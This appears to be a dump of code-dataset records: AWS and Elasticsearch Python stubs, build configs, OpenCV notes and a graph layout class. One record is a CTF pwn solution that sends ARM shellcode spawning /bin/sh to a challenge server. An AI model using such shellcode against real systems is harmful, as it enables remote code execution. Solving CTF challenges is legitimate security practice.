boto3_type_annotations/boto3_type_annotations/dms/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations/boto3_type_annotations/dms/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Dict
from typing import List
from botocore.waiter import Waiter
class EndpointDeleted(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WaiterConfig: Dict = None):
pass
class ReplicationInstanceAvailable(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WaiterConfig: Dict = None):
pass
class ReplicationInstanceDeleted(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WaiterConfig: Dict = None):
pass
class ReplicationTaskDeleted(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None, WaiterConfig: Dict = None):
pass
class ReplicationTaskReady(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None, WaiterConfig: Dict = None):
pass
class ReplicationTaskRunning(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None, WaiterConfig: Dict = None):
pass
class ReplicationTaskStopped(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None, WaiterConfig: Dict = None):
pass
class TestConnectionSucceeds(Waiter):
def wait(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WaiterConfig: Dict = None):
pass
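These classes are type-annotation stubs; at runtime the equivalent waiters come from boto3 itself. A hedged usage sketch follows, with the waiter name using boto3's documented snake_case convention and the region, filter values and WaiterConfig numbers as placeholders.

# Hedged usage sketch: how the annotated DMS waiters map onto boto3 calls.
# The region, filter values and WaiterConfig numbers are placeholders.
import boto3

dms = boto3.client('dms', region_name='us-east-1')
waiter = dms.get_waiter('replication_task_stopped')
waiter.wait(
    Filters=[{'Name': 'replication-task-id', 'Values': ['my-task']}],
    WaiterConfig={'Delay': 30, 'MaxAttempts': 20},
)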
| 34.818182
| 142
| 0.696475
| 177
| 1,532
| 6.028249
| 0.163842
| 0.067479
| 0.09747
| 0.12746
| 0.763824
| 0.763824
| 0.763824
| 0.763824
| 0.763824
| 0.763824
| 0
| 0
| 0.201044
| 1,532
| 43
| 143
| 35.627907
| 0.871732
| 0
| 0
| 0.592593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.296296
| false
| 0.296296
| 0.111111
| 0
| 0.703704
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
1b4648f902c46b3ba37b17ac5dd30692120bf247
| 119
|
py
|
Python
|
habari/settings/local.py
|
ppolle/habari
|
671b98c361ce593f708bc15f69dd3aa6fe72b128
|
[
"MIT"
] | 3
|
2020-06-08T08:39:06.000Z
|
2020-07-30T10:46:22.000Z
|
habari/settings/local.py
|
ppolle/habari
|
671b98c361ce593f708bc15f69dd3aa6fe72b128
|
[
"MIT"
] | 9
|
2021-03-19T11:18:58.000Z
|
2022-02-10T15:48:35.000Z
|
habari/settings/local.py
|
ppolle/habari
|
671b98c361ce593f708bc15f69dd3aa6fe72b128
|
[
"MIT"
] | 1
|
2021-09-22T07:23:03.000Z
|
2021-09-22T07:23:03.000Z
|
import sys
if 'test' in sys.argv:
from habari.settings.test import *
else:
from habari.settings.dev import *
| 17
| 38
| 0.697479
| 18
| 119
| 4.611111
| 0.611111
| 0.240964
| 0.433735
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210084
| 119
| 6
| 39
| 19.833333
| 0.882979
| 0
| 0
| 0
| 0
| 0
| 0.033613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1b522424b865fc9db3867c58abc3c0d93bfaf58d
| 2,171
|
py
|
Python
|
extension/fts/fts_config.py
|
AldoMyrtaj/duckdb
|
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
|
[
"MIT"
] | 2,816
|
2018-06-26T18:52:52.000Z
|
2021-04-06T10:39:15.000Z
|
extension/fts/fts_config.py
|
AldoMyrtaj/duckdb
|
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
|
[
"MIT"
] | 1,310
|
2021-04-06T16:04:52.000Z
|
2022-03-31T13:52:53.000Z
|
extension/fts/fts_config.py
|
AldoMyrtaj/duckdb
|
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
|
[
"MIT"
] | 270
|
2021-04-09T06:18:28.000Z
|
2022-03-31T11:55:37.000Z
|
import os
# list all include directories
include_directories = [os.path.sep.join(x.split('/')) for x in ['extension/fts/include', 'third_party/snowball/libstemmer', 'third_party/snowball/runtime', 'third_party/snowball/src_c']]
# source files
source_files = [os.path.sep.join(x.split('/')) for x in ['extension/fts/fts-extension.cpp', 'extension/fts/fts_indexing.cpp']]
# snowball
source_files += [os.path.sep.join(x.split('/')) for x in ['third_party/snowball/libstemmer/libstemmer.cpp', 'third_party/snowball/runtime/utilities.cpp', 'third_party/snowball/runtime/api.cpp', 'third_party/snowball/src_c/stem_UTF_8_arabic.cpp', 'third_party/snowball/src_c/stem_UTF_8_basque.cpp', 'third_party/snowball/src_c/stem_UTF_8_catalan.cpp', 'third_party/snowball/src_c/stem_UTF_8_danish.cpp', 'third_party/snowball/src_c/stem_UTF_8_dutch.cpp', 'third_party/snowball/src_c/stem_UTF_8_english.cpp', 'third_party/snowball/src_c/stem_UTF_8_finnish.cpp', 'third_party/snowball/src_c/stem_UTF_8_french.cpp', 'third_party/snowball/src_c/stem_UTF_8_german.cpp', 'third_party/snowball/src_c/stem_UTF_8_german2.cpp', 'third_party/snowball/src_c/stem_UTF_8_greek.cpp', 'third_party/snowball/src_c/stem_UTF_8_hindi.cpp', 'third_party/snowball/src_c/stem_UTF_8_hungarian.cpp', 'third_party/snowball/src_c/stem_UTF_8_indonesian.cpp', 'third_party/snowball/src_c/stem_UTF_8_irish.cpp', 'third_party/snowball/src_c/stem_UTF_8_italian.cpp', 'third_party/snowball/src_c/stem_UTF_8_kraaij_pohlmann.cpp', 'third_party/snowball/src_c/stem_UTF_8_lithuanian.cpp', 'third_party/snowball/src_c/stem_UTF_8_lovins.cpp', 'third_party/snowball/src_c/stem_UTF_8_nepali.cpp', 'third_party/snowball/src_c/stem_UTF_8_norwegian.cpp', 'third_party/snowball/src_c/stem_UTF_8_porter.cpp', 'third_party/snowball/src_c/stem_UTF_8_portuguese.cpp', 'third_party/snowball/src_c/stem_UTF_8_romanian.cpp', 'third_party/snowball/src_c/stem_UTF_8_russian.cpp', 'third_party/snowball/src_c/stem_UTF_8_serbian.cpp', 'third_party/snowball/src_c/stem_UTF_8_spanish.cpp', 'third_party/snowball/src_c/stem_UTF_8_swedish.cpp', 'third_party/snowball/src_c/stem_UTF_8_tamil.cpp', 'third_party/snowball/src_c/stem_UTF_8_turkish.cpp']]
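The three list comprehensions above all use the same idiom: keep the configuration written with forward slashes and convert to the host's path separator only when the lists are built. A hedged, stand-alone sketch of that idiom follows; the helper name to_native() is made up.

# Hedged sketch of the path-normalisation idiom used above; to_native() is a
# made-up helper name, the conversion itself mirrors the config file.
import os

def to_native(paths):
    return [os.path.sep.join(p.split('/')) for p in paths]

print(to_native(['extension/fts/include', 'third_party/snowball/runtime']))
# Prints the paths unchanged on POSIX; with backslashes on Windows.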
| 241.222222
| 1,788
| 0.823584
| 387
| 2,171
| 4.20155
| 0.160207
| 0.221402
| 0.398524
| 0.413284
| 0.731242
| 0.683272
| 0.683272
| 0.683272
| 0.683272
| 0.074416
| 0
| 0.014755
| 0.032243
| 2,171
| 8
| 1,789
| 271.375
| 0.759162
| 0.023031
| 0
| 0
| 0
| 0
| 0.835539
| 0.834121
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
59fdc1f49c3c899a2657021f7d372b450f5a78a2
| 5,325
|
py
|
Python
|
utils/Type of preprocessing.py
|
sixduck/Sorting-robot-using-Opencv-Tensorflow-Arduino
|
54f58d8899b3c29dcb12eb4843f3418d36824c8a
|
[
"MIT"
] | null | null | null |
utils/Type of preprocessing.py
|
sixduck/Sorting-robot-using-Opencv-Tensorflow-Arduino
|
54f58d8899b3c29dcb12eb4843f3418d36824c8a
|
[
"MIT"
] | null | null | null |
utils/Type of preprocessing.py
|
sixduck/Sorting-robot-using-Opencv-Tensorflow-Arduino
|
54f58d8899b3c29dcb12eb4843f3418d36824c8a
|
[
"MIT"
] | null | null | null |
x=1
y=2
z=3
# # 1s or less
# diff_low_t=35
# diff_high_t=255
# target_gray = cv2.cvtColor(anh_phat_hien_crop, cv2.COLOR_BGR2GRAY)
# self.previewImage('a', target_gray)
# bg_gray = cv2.cvtColor(anh_nen_crop, cv2.COLOR_BGR2GRAY)
# self.previewImage('a', bg_gray)
# diff_gray = cv2.absdiff(target_gray,bg_gray)
# self.previewImage('a', diff_gray)
# diff_gray_blur = cv2.GaussianBlur(diff_gray,(5,5),0)
# self.previewImage('a', diff_gray_blur)
# ret,diff_tresh = cv2.threshold(diff_gray_blur,diff_low_t,diff_high_t,cv2.THRESH_BINARY)
# self.previewImage('a', diff_tresh)
# diff = cv2.GaussianBlur(diff_tresh,(5,5),0)
# self.previewImage('a', diff)
# contours, hierarchy = cv2.findContours(diff, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# # 1s
# bg_low_t=255
# bg_high_t=255
# img_low_t=60
# img_high_t=255
# background_img_gray=cv2.cvtColor(anh_nen_crop, cv2.COLOR_BGR2GRAY)
# self.previewImage("1 Background Gray",background_img_gray)
# background_img_blur = cv2.GaussianBlur(background_img_gray,(5,5),0)
# self.previewImage("2 Background Blur Gray",background_img_blur)
# ret,background_img_tresh = cv2.threshold(background_img_blur,bg_low_t,bg_high_t,cv2.THRESH_BINARY_INV)
# self.previewImage("3 Background Treshold",background_img_tresh)
# img_gray=cv2.cvtColor(anh_phat_hien_crop, cv2.COLOR_BGR2GRAY)
# self.previewImage("4 Image Gray",img_gray)
# img_blur = cv2.GaussianBlur(img_gray,(5,5),0)
# self.previewImage("5 Image Blur Gray",img_blur)
# ret,img_tresh = cv2.threshold(img_blur,img_low_t,img_high_t,cv2.THRESH_BINARY_INV)
# self.previewImage("6 Image Treshold",img_tresh)
# diff=cv2.absdiff(background_img_tresh,img_tresh)
# self.previewImage("7 Diff",diff)
# contours, hierarchy = cv2.findContours(diff, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# # 1.3s
# blur_bg = cv2.GaussianBlur(anh_nen_crop, (21, 21), 0)
# blur_target = cv2.GaussianBlur(anh_phat_hien_crop, (21, 21), 0)
# self.previewImage('anh_mo', blur_bg)
# self.previewImage('anh_phat_hien_mo', blur_target)
# gray_target = cv2.cvtColor(blur_target,cv2.COLOR_BGR2GRAY)
# gray_bg = cv2.cvtColor(blur_bg,cv2.COLOR_BGR2GRAY)
# frameDelta = cv2.absdiff(blur_bg,blur_target)
# self.previewImage('khac_biet', frameDelta)
# gray_result = cv2.cvtColor(frameDelta, cv2.COLOR_BGR2GRAY)
# self.previewImage('den_trang', gray_result)
# _, threshold = cv2.threshold(gray_result, 40, 255, cv2.THRESH_BINARY)
# thresh = cv2.dilate(threshold, None, iterations=2)
# self.previewImage('contour', thresh)
# contours,_ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# 1s or less
# diff_low_t=35
# diff_high_t=255
# target_gray = cv2.cvtColor(crop_phat_hien, cv2.COLOR_BGR2GRAY)
# previewImage('a', target_gray)
# bg_gray = cv2.cvtColor(crop_nen, cv2.COLOR_BGR2GRAY)
# previewImage('a', bg_gray)
# diff_gray = cv2.absdiff(target_gray,bg_gray)
# previewImage('a', diff_gray)
# diff_gray_blur = cv2.GaussianBlur(diff_gray,(5,5),0)
# previewImage('a', diff_gray_blur)
# ret,diff_tresh = cv2.threshold(diff_gray_blur,diff_low_t,diff_high_t,cv2.THRESH_BINARY)
# previewImage('a', diff_tresh)
# diff = cv2.GaussianBlur(diff_tresh,(5,5),0)
# previewImage('a', diff)
# contours, hierarchy = cv2.findContours(diff, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
# # contours, hierarchy = cv2.findContours(diff, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# 1s
# bg_low_t=255
# bg_high_t=255
# img_low_t=60
# img_high_t=255
# background_img_gray=cv2.cvtColor(crop_nen , cv2.COLOR_BGR2GRAY)
# previewImage("1 Background Gray",background_img_gray)
# background_img_blur = cv2.GaussianBlur(background_img_gray,(5,5),0)
# previewImage("2 Background Blur Gray",background_img_blur)
# ret,background_img_tresh = cv2.threshold(background_img_blur,bg_low_t,bg_high_t,cv2.THRESH_BINARY_INV)
# previewImage("3 Background Treshold",background_img_tresh)
# img_gray=cv2.cvtColor(crop_phat_hien, cv2.COLOR_BGR2GRAY)
# previewImage("4 Image Gray",img_gray)
# img_blur = cv2.GaussianBlur(img_gray,(5,5),0)
# previewImage("5 Image Blur Gray",img_blur)
# ret,img_tresh = cv2.threshold(img_blur,img_low_t,img_high_t,cv2.THRESH_BINARY_INV)
# previewImage("6 Image Treshold",img_tresh)
# diff=cv2.absdiff(background_img_tresh,img_tresh)
# previewImage("7 Diff",diff)
# contours, hierarchy = cv2.findContours(diff, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
# 1.3s
# blur_bg = cv2.GaussianBlur(crop_nen, (21, 21), 0)
# blur_target = cv2.GaussianBlur(crop_phat_hien, (21, 21), 0)
# previewImage('anh_mo', blur_bg)
# previewImage('anh_phat_hien_mo', blur_target)
# gray_target = cv2.cvtColor(blur_target,cv2.COLOR_BGR2GRAY)
# gray_bg = cv2.cvtColor(blur_bg,cv2.COLOR_BGR2GRAY)
# frameDelta = cv2.absdiff(blur_bg,blur_target)
# previewImage('khac_biet', frameDelta)
# gray_result = cv2.cvtColor(frameDelta, cv2.COLOR_BGR2GRAY)
# previewImage('den_trang', gray_result)
# _, threshold = cv2.threshold(gray_result, 40, 255, cv2.THRESH_BINARY)
# thresh = cv2.dilate(threshold, None, iterations=2)
# previewImage('contour', thresh)
# contours,_ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
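The commented-out blocks above sketch three background-subtraction variants (grayscale absdiff of the two frames, per-image thresholding before the diff, and blur-then-diff on the colour frames) with rough timings noted as "1s or less", "1s" and "1.3s". Below is a hedged, runnable version of the first variant; the input file names are placeholders.

# Hedged sketch of the first commented-out variant above: grayscale absdiff of
# background vs. target, blur, threshold, then contour extraction.
# 'background.png' and 'target.png' are placeholder file names.
import cv2

background = cv2.imread('background.png')
target = cv2.imread('target.png')

bg_gray = cv2.cvtColor(background, cv2.COLOR_BGR2GRAY)
target_gray = cv2.cvtColor(target, cv2.COLOR_BGR2GRAY)

diff_gray = cv2.absdiff(target_gray, bg_gray)
diff_blur = cv2.GaussianBlur(diff_gray, (5, 5), 0)
_, diff_thresh = cv2.threshold(diff_blur, 35, 255, cv2.THRESH_BINARY)

contours, hierarchy = cv2.findContours(diff_thresh, cv2.RETR_EXTERNAL,
                                       cv2.CHAIN_APPROX_SIMPLE)
print(len(contours), 'contours found')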
| 39.738806
| 105
| 0.739906
| 788
| 5,325
| 4.681472
| 0.091371
| 0.07807
| 0.060721
| 0.037951
| 0.97723
| 0.962591
| 0.962591
| 0.94199
| 0.932773
| 0.916237
| 0
| 0.045759
| 0.129953
| 5,325
| 134
| 106
| 39.738806
| 0.750486
| 0.912864
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
948c51a54bf9372de987684448ea44f76f76f67c
| 722
|
py
|
Python
|
2018/CrossCTF_2018/Finals/Pwn/FTLOG/soln_ftlong.py
|
solomonbstoner/solomonbston3r-ctf-diary
|
2eb5439b157ca0c97db313c9762c6b5d8a714a85
|
[
"Unlicense"
] | 14
|
2018-04-01T00:52:42.000Z
|
2020-07-11T06:17:49.000Z
|
2018/CrossCTF_2018/Finals/Pwn/FTLOG/soln_ftlong.py
|
solomonbstoner/solomonbston3r-ctf-diary
|
2eb5439b157ca0c97db313c9762c6b5d8a714a85
|
[
"Unlicense"
] | 5
|
2018-04-03T00:40:58.000Z
|
2021-06-02T13:37:43.000Z
|
2018/CrossCTF_2018/Finals/Pwn/FTLOG/soln_ftlong.py
|
solomonbstoner/solomonbston3r-ctf-diary
|
2eb5439b157ca0c97db313c9762c6b5d8a714a85
|
[
"Unlicense"
] | null | null | null |
from pwn import *
r = remote('ctf.pwn.sg', 4004)
#r = process('./ftlog')
exploit = '\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0a\x30\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf\x2f\x2f\x62\x69\x6e\x2f\x73\x68'
# exploit did not work
exploit2 = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68'
#exploit2 did not work
exploit3 = '\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68'
#exploit 3 somehow worked. Taken from https://www.exploit-db.com/exploits/43520/
print(r.recv(1000000))
r.sendline(exploit3)
r.interactive()
| 32.818182
| 169
| 0.721607
| 148
| 722
| 3.52027
| 0.412162
| 0.126679
| 0.172745
| 0.207294
| 0.43762
| 0.43762
| 0.43762
| 0.241843
| 0.241843
| 0.241843
| 0
| 0.269345
| 0.069252
| 722
| 21
| 170
| 34.380952
| 0.505952
| 0.198061
| 0
| 0
| 0
| 0.375
| 0.733913
| 0.716522
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.125
| null | null | 0.125
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84b1fa1b9a4d979dee785354836c06b02ef95339
| 206
|
py
|
Python
|
aioelasticsearch/exceptions.py
|
sloev/aioelasticsearch
|
26fcd7cce748f40cbd0833f49f399a2b5f08bb2e
|
[
"MIT"
] | 123
|
2018-01-23T02:45:07.000Z
|
2022-03-28T10:09:15.000Z
|
aioelasticsearch/exceptions.py
|
sloev/aioelasticsearch
|
26fcd7cce748f40cbd0833f49f399a2b5f08bb2e
|
[
"MIT"
] | 231
|
2018-01-19T00:34:35.000Z
|
2022-01-31T13:18:27.000Z
|
aioelasticsearch/exceptions.py
|
sloev/aioelasticsearch
|
26fcd7cce748f40cbd0833f49f399a2b5f08bb2e
|
[
"MIT"
] | 39
|
2018-04-01T03:11:03.000Z
|
2022-03-27T19:32:08.000Z
|
from elasticsearch.exceptions import * # noqa # isort:skip
from elasticsearch.exceptions import (AuthenticationException, # noqa # isort:skip
AuthorizationException)
| 51.5
| 83
| 0.665049
| 16
| 206
| 8.5625
| 0.5625
| 0.248175
| 0.394161
| 0.481752
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.276699
| 206
| 3
| 84
| 68.666667
| 0.919463
| 0.160194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
84dfb48247d0254a6b9a97f204163f64a413bccc
| 165
|
py
|
Python
|
loldib/getratings/models/NA/na_lissandra/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_lissandra/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_lissandra/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_lissandra_top import *
from .na_lissandra_jng import *
from .na_lissandra_mid import *
from .na_lissandra_bot import *
from .na_lissandra_sup import *
| 27.5
| 32
| 0.787879
| 25
| 165
| 4.8
| 0.36
| 0.25
| 0.625
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 165
| 5
| 33
| 33
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
84fe2a1856cfe378d66acbb424f70323104c05b1
| 5,782
|
py
|
Python
|
viz/layout.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | null | null | null |
viz/layout.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | 11
|
2020-11-13T18:29:37.000Z
|
2022-02-10T00:25:15.000Z
|
viz/layout.py
|
HuynhThanhQuan/graph-network
|
e429a641e7baecad9765700cac580cfbdedbe1bd
|
[
"MIT"
] | null | null | null |
import numpy as np
class Layout:
@staticmethod
def get_volcano_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_xy_location(node_layer_map, pos):
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
z_loc = pos[2]
layer = node_layer_map[node]
radius = layer / num_layers
x_loc = np.random.uniform(-radius, radius)
y_loc = [-1, 1][np.random.randint(2)] * np.sqrt(radius ** 2 - x_loc ** 2)
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
new_pos = relocate_xy_location(node_layer_map, new_pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
@staticmethod
def get_cylinder_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_xy_location(pos):
new_pos = {}
for node, pos in pos.items():
z_loc = pos[2]
radius = 1
x_loc = np.random.uniform(-radius, radius)
y_loc = [-1, 1][np.random.randint(2)] * np.sqrt(radius ** 2 - x_loc ** 2)
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
new_pos = relocate_xy_location(new_pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
@staticmethod
def get_tree_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
@staticmethod
def get_tree_centralized_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_xy_location(pos, margin=0.1):
new_pos = {}
for node, pos in pos.items():
weight = digraph.nodes[node]['frequency']
z_loc = pos[2]
radius = 1/weight + margin
x_loc = np.random.uniform(-radius, radius)
y_loc = np.random.uniform(-radius, radius)
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
new_pos = relocate_xy_location(new_pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
@staticmethod
def get_word2vector_layout(digraph, position):
def relocate_z_position(node_layer_map, pos):
top_z = 1
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
x_loc, y_loc = pos[0], pos[1]
layer = node_layer_map[node]
z_loc = top_z - layer / num_layers
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_xy_location(node_layer_map, pos):
new_pos = {}
num_layers = max(list(zip(*node_layer_map))[1])
for node, pos in pos.items():
z_loc = pos[2]
layer = node_layer_map[node]
radius = layer / num_layers
x_loc = np.random.uniform(-radius, radius)
y_loc = [-1, 1][np.random.randint(2)] * np.sqrt(radius ** 2 - x_loc ** 2)
new_pos[node] = (x_loc, y_loc, z_loc)
return new_pos
def relocate_node_position(node_layer_map, pos):
new_pos = relocate_z_position(node_layer_map, pos)
new_pos = relocate_xy_location(node_layer_map, new_pos)
return new_pos
return relocate_node_position(digraph.nodes.data('level'), position)
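Each Layout helper post-processes an existing 2D layout into 3D coordinates keyed by the nodes' 'level' attribute. A hedged usage sketch with a recent networkx release follows; the graph, its 'level' values and the choice of spring_layout are illustrative only.

# Hedged usage sketch for the Layout helpers above; the graph and its 'level'
# attribute are made up for illustration.
import networkx as nx

digraph = nx.DiGraph()
digraph.add_edges_from([('root', 'a'), ('root', 'b'), ('a', 'c')])
nx.set_node_attributes(digraph, {'root': 1, 'a': 2, 'b': 2, 'c': 3}, 'level')

pos2d = nx.spring_layout(digraph)  # any 2D layout will do
pos3d = Layout.get_tree_layout(digraph, pos2d)
print(pos3d)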
| 40.152778
| 89
| 0.556382
| 773
| 5,782
| 3.826649
| 0.06727
| 0.091278
| 0.133874
| 0.086207
| 0.955375
| 0.955375
| 0.93881
| 0.93881
| 0.927992
| 0.91616
| 0
| 0.01216
| 0.345728
| 5,782
| 143
| 90
| 40.433566
| 0.769759
| 0
| 0
| 0.897638
| 0
| 0
| 0.00588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.149606
| false
| 0
| 0.007874
| 0
| 0.314961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca76eaa4ce16f8855af3ee54c6d3109278f007be
| 939
|
py
|
Python
|
tests/test_get_url_from_args.py
|
psass-edfsf/centralized-pre-commit-conf
|
49ae2cf524dc90f55dfffc2c38ece3e1a2365c5f
|
[
"MIT"
] | 6
|
2020-05-25T07:11:53.000Z
|
2021-02-03T01:53:14.000Z
|
tests/test_get_url_from_args.py
|
